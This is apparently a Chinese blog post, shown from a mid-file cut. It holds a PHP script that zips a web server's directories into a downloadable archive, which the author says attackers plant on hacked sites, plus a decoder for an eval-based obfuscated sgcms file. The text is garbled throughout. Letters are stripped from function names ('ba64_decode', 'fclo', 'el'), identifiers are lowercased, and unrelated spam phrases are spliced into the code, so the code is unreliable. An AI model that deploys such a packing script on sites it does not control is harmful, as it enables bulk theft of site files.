$this->dirstr .= $dirstr;

$this ->file_count ++;

$this ->dirstr_len += strlen($dirstr);

$this ->datastr_len += $my_datastr_len;

}

function adddir($name)

{

$name = str_replace(“\\”,’/’,$name);

$datastr = “\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00”;

$datastr .= pack(‘v’,0).pack(‘v’,0).pack(‘v’,0).pack(‘v’,strlen($name) );

$datastr .= pack(‘v’,0 ).$name.pack(‘v’,0).pack(‘v’,0).pack(‘v’,0);

fwrite($this->fp,$datastr);

$my_datastr_len = strlen($datastr);

unt($datastr);

$dirstr = “\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00”;

$dirstr .= pack(‘v’,0).pack(‘v’,0).pack(‘v’,0).pack(‘v’,strlen($name) );

$dirstr .= pack(‘v’,0 ).pack(‘v’,0 ).pack(‘v’,0 ).pack(‘v’,0 );

$dirstr .= pack(‘v’,16 ).pack(‘v’,$this->datastr_len).$name;

$this->dirstr .= $dirstr;

$this ->file_count ++;

$this ->dirstr_len += strlen($dirstr);

$this ->datastr_len += $my_datastr_len;

}

function createfile()

{

$endstr = “\x50\x4b\x05\x06\x00\x00\x00\x00”.

pack(‘v’,$this ->file_count) .

pack(‘v’,$this ->file_count) .

pack(‘v’,$this ->dirstr_len) .

pack(‘v’,$this ->datastr_len) .

“\x00\x00”;

fwrite($this->fp,$this->dirstr.$endstr);

fclo($this->fp);

}

}

if(!trim($_request[zipname]))

$_request[zipname] = ‘dodozip.zip’;

el

$_request[zipname] = trim($_request[zipname]);

if(!strrchr(strtolower($_request[zipname]),’.’)==’.zip’)

$_request[zipname] .= ‘.zip’;

$_request[todir] = str_replace(‘\\’,’/’,trim($_request[todir]));

if(!strrchr(strtolower($_request[todir]),’/’)==’/’)

$_request[todir] .= ‘/’;

if($_request[todir]==’/’)

$_request[todir] = ‘./’;

function listfiles($dir=’.’)

{

global $dodozip;

$sub_file_num = 0;

if(is_file(“$dir”))

{

if(realpath($dodozip ->gzfilename)!=realpath(“$dir”))

{

$dodozip ->addfile(implode(”,file(“$dir”)),”$dir”);

return 1;

}

return 0;

}

$handle=opendir(“$dir”);

while ($file = readdir($handle))

{

if($file==’.’||$file==’..’)

continue;

if(is_dir(“$dir/$file”))

{

$sub_file_num += listfiles(“$dir/$file”);

}

el

{

if(realpath($dodozip ->gzfilename)!=realpath(“$dir/$file”))

{

$dodozip ->addfile(implode(”,file(“$dir/$file”)),”$dir/$file”);

$sub_file_num ++;

}

}

}

clodir($handle);

if(!$sub_file_num)

$dodozip ->addfile(”,”$dir/”);

return $sub_file_num;

}

function num_bitunit($num)

{

$bitunit=array(‘ b’,’ kb’,’ mb’,’ gb’);

for($key=0;$key<count($bitunit);$key++)

{

if($num>=pow(2,10*$key)-1)

{

$num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100).” $bitunit[$key]”;

}

}

return $num_bitunit_str;

}

if(is_array($_request[dfile]))

{

$dodozip = new phpzip;

if($_request[‘filetype’] != null)

$dodozip ->tfilefilter($_request[‘filetype’]);

if($dodozip ->startfile(“$_request[todir]$_request[zipname]”))

{

echo ‘working,plea wait…<br><br>’;

$filenum = 0;

foreach($_request[dfile] as $file)

{

if(is_file($file))

{

if(!empty($dodozip ->filefilters))

if (!in_array(end(explode(‘.’,$file)),$dodozip ->filefilters))

continue;

echo “<font face=\”wingdings\” size=\”5\”>2</font>$file<br>”;

}

el

{

echo “<font face=\”wingdings\” size=\”5\”>0</font>$file<br>”;

}

$filenum += listfiles($file);

}

$dodozip ->createfile();

ec济南大学怎么样ho “<br>success,for $filenum files.url:<a href=’$_request[todir]$_request[zipname]’ _fcksavedurl=’$_request[todir]$_request[zipname]’>$_request[todir]$_request[zipname] (“.num_bitunit(filesize(“$_request[todir]$_request[zipname]”)).’)</a>’;

}

el

{

echo “$_request[todir]$_request[zipname] error,unable to write file.<br>”;

}

}

;echo ‘

</form>

</body>

</html>

‘;?>

这是一个用来打包成zip的php代码，这些鸟人为了黑别人的网站什么办法都用，真恶心~~

下如是一个高人写的thinkphp框架(sgcms)解密程序：

复制代码代码如下:

<?php

// this file is protected by sgcms & provided under licen.

copyright(c) 2007-2010 www.sgcms.cn, all rights rerved.

$ooo0o0o00=__file__;

$ooo000000=urldecode(‘th6sbehqla4co_sadfpnr’);

$oo00o0000=21496;

$ooo0000o0=$ooo000000{4}.

$ooo000000{9}.$ooo000000{3}.$ooo000000{5};

$ooo0000o0.=$ooo000000{2}.$ooo000000{10}.$ooo000000{13}.$ooo000000{16};

$ooo0000o0.=$ooo0000o0{3}.$ooo000000{11}.$ooo000000{12}.$ooo0000o0{7}.$ooo000000{5};

$o0o0000o0=’ooo0000o0′;

eval(($$o0o0000o0(‘je9pme9pmdawmd0kt09pmdawmdaweze3fs4kt09pmdawm…

很明显，是使用了某种php代码混淆工具混淆了下，google网上搜了下，问题解决，给遇到同样问题的朋友一个方便。

解密php文件：

复制代码代码如下:

<?php

$filename=”globalaction.class.php”;//要解密的文件

$lines = file($filename);//0,1,2行

//第一次ba64解密

$content=””;

if(preg_match(“/o0o0000o0$‘.*’$/”,$lines[1],$y))

{

$content=str_replace(“o0o0000o0(‘”,””,$y[0]);

$content=str_replace(“‘)”,””,$content);

$content=ba64_decode($content);

}

//第一次b怎么哄老婆开心a64解密后的内容中查找密钥

$decode_key=””;

if(preg_match(“/\),’.*’,/”,$content,$k))

{

$decode_key=str_replace(“),'”,””,$k[0]);

$decode_key=str_replace(“‘,”,””,$decode_key);

}

//查找要截取字符串长度

$str_length=””;

if(preg_match(“/,\d*\),/”,$content,$k))

{

$str_length=str_replace(“),”,””,$k[0]);

$str_length=str_replace(“,”,””,$str_length);

}

//截取文件加密后的密文

$cret=substr($lines[2],$str_length);

//echo $cret;

//直接还原密文输出

echo “<?php\n”.ba64_decode(strtr($cret,$decode_key,

‘abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/’)).

“?>”;

?>